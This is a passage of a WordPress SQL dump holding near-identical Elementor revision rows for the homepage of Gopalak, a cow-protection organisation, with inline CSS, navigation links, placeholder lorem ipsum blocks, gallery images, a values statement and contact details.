560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:32:43','2022-10-11 05:02:43','',1373,'https://gopalak.in/?p=1606',0,'revision','',0),(1607,1,'2022-10-11 10:32:43','2022-10-11 05:02:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:32:43','2022-10-11 05:02:43','',1373,'https://gopalak.in/?p=1607',0,'revision','',0),(1608,1,'2022-10-11 10:33:26','2022-10-11 05:03:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:33:26','2022-10-11 05:03:26','',1373,'https://gopalak.in/?p=1608',0,'revision','',0),(1609,1,'2022-10-11 10:33:26','2022-10-11 05:03:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:33:26','2022-10-11 05:03:26','',1373,'https://gopalak.in/?p=1609',0,'revision','',0),(1610,1,'2022-10-11 10:33:26','2022-10-11 05:03:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" 